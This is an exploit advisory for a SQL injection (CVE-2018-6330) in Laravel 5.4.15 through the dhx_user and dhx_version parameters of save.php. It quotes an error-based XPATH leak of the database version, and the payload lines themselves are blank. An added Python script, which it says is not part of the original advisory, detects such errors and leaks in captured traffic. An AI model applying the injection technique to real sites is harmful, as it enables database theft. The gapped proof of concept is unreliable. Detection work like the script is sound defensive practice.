# Exploit Title: Laravel SQL Injection 5.4.15

# Date: 26.01.2018

# Software Link: https://laravel.com/

# Exploit Author: Gianluca Bonanno

# Contact: Gianluca.bonanno@i-sec.tuv.com

# CVE: CVE-2018-6330

# Category: Webapps

# Version: 5.4.15

# Tested on: Apache 2.4.29

  1. Description

Any registered user can exploit the SQL injection because the input is not sanitized inside save.php. The affected parameters are dhx_user and dhx_version.

  2. Proof of Concept

Log in as a user, then send the following request:

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: https://xxxxxxx.net/agenda
X-Requested-With: XMLHttpRequest

In the response you will see:

You have an Error in your Mysql Syntax.

To get the database version displayed, you can send the following payload:


The Response will look like this:


<span class="exception_message">PDO – sql execution failed<br />

XPATH syntax error: '\qqvkq5.7.18-1qvxqq'</span>
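
For detection, the following is an added example and not part of the original advisory: it scans captured request/response pairs for the error output quoted above and separates a plain SQL error from a response that discloses data inside an XPATH error. The record layout, the form-encoded request body and the names Finding, classify and scan are assumptions made for the example.

```python
import re
from dataclasses import dataclass

# Signatures taken from the error text quoted in this advisory.
SQL_ERROR = re.compile(r"error in your (?:my)?sql syntax|sql execution failed", re.I)
# Error-based leak: data echoed between the quotes of an XPATH error
# (straight or typographic quotes, since HTML rendering may alter them).
XPATH_LEAK = re.compile(r"XPATH syntax error:\s*['\u201a\u2018\u2019](.*?)['\u201a\u2018\u2019]", re.I)
PARAMS = ("dhx_user", "dhx_version")  # parameters named in the advisory


@dataclass
class Finding:
    request_id: str
    severity: str  # "probe": SQL error shown; "leak": data returned in the error
    params: tuple  # affected parameters present in the request body
    leaked: str    # text disclosed inside the XPATH error, if any


def classify(request_id, request_body, response_body):
    """Return a Finding when the response exposes SQL error output, else None."""
    present = tuple(p for p in PARAMS if re.search(rf"(?:^|&){p}=", request_body))
    leak = XPATH_LEAK.search(response_body)
    if leak:
        return Finding(request_id, "leak", present, leak.group(1))
    if SQL_ERROR.search(response_body):
        return Finding(request_id, "probe", present, "")
    return None


def scan(records):
    """records: iterable of (request_id, request_body, response_body) tuples."""
    return [f for r in records if (f := classify(*r)) is not None]


# Constructed sample records; request values are redacted placeholders.
SAMPLE = [
    ("req-1", "dhx_user=REDACTED&dhx_version=1", "You have an Error in your Mysql Syntax."),
    ("req-2", "dhx_user=1&dhx_version=REDACTED",
     r"""<span class="exception_message">PDO - sql execution failed<br />"""
     r"""XPATH syntax error: '\qqvkq5.7.18-1qvxqq'</span>"""),
    ("req-3", "dhx_user=1&dhx_version=1", "OK"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```

A "leak" finding means database content has already been returned to the client, so it calls for incident handling as well as blocking.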